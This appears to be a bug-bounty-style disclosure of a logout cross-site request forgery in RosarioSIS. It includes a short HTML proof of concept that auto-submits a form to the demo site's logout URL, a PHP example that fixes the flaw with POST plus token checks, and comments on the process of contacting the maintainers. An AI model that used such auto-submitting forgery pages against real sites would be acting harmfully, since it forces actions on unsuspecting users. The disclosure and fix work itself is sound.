Cross-Site Request Forgery (CSRF) in francoisjacquet/rosariosis
Dec 11th 2021
An attacker is able to log out a user if a logged-in user visits the attacker's website.
Proof of Concept
<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://www.rosariosis.org/demonstration/index.php?modfunc=logout">
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
This vulnerability can force users into an unintentional logout.
One way GET could be abused here is that a person (competitor perhaps:) placed an image tag with src="<your logout link>" anywhere on the internet, and if a user of your site stumbles upon that page, he will be unknowingly logged out. This is why it should be a POST with a
While this cannot harm a user's account, it can be a great annoyance and is a valid CSRF.
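The report says logout should be a POST rather than a GET. As an added example (not RosarioSIS code and not the maintainers' patch; the function names and the `csrf_token` field name are assumptions), a PHP logout check that requires POST plus a per-session token and therefore rejects the GET request from the proof of concept:

```php
<?php
// Added example, not RosarioSIS code. All function and field names are hypothetical.
declare(strict_types=1);

/** Return the session's CSRF token, creating it on first use. */
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

/** Logout changes state: accept it only as a POST carrying the session's token. */
function logout_allowed(string $method, array $post, array $session): bool
{
    if ($method !== 'POST') {
        return false; // image tags, links and GET forms all arrive as GET
    }
    $sent = $post['csrf_token'] ?? '';
    $expected = $session['csrf_token'] ?? '';
    return is_string($sent) && is_string($expected) && $expected !== ''
        && hash_equals($expected, $sent); // constant-time comparison
}

/** Logout button rendered on the application's own pages. */
function logout_form(array &$session): string
{
    $token = htmlspecialchars(csrf_token($session), ENT_QUOTES, 'UTF-8');
    return '<form method="post" action="index.php?modfunc=logout">'
        . '<input type="hidden" name="csrf_token" value="' . $token . '">'
        . '<button type="submit">Log out</button></form>';
}

// Constructed requests, evaluated when the file is run from the CLI.
if (PHP_SAPI === 'cli') {
    $session = [];
    $token = csrf_token($session);
    var_dump(logout_allowed('GET', [], $session));                         // cross-site GET, as in the PoC
    var_dump(logout_allowed('POST', [], $session));                        // forged POST without a token
    var_dump(logout_allowed('POST', ['csrf_token' => 'guess'], $session)); // forged POST, wrong token
    var_dump(logout_allowed('POST', ['csrf_token' => $token], $session));  // the application's own form
}
```

In an application the check would be called as `logout_allowed($_SERVER['REQUEST_METHOD'], $_POST, $_SESSION)` before the session is destroyed.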
It's been 2 days and I do not see the notification that you contacted the maintainer team and are waiting to hear back, like the normal process.
@khanhchauminh - we are still waiting for the maintainers to create a SECURITY.md with a contactable e-mail at this stage.
Once they have done this, we will be able to send them further details.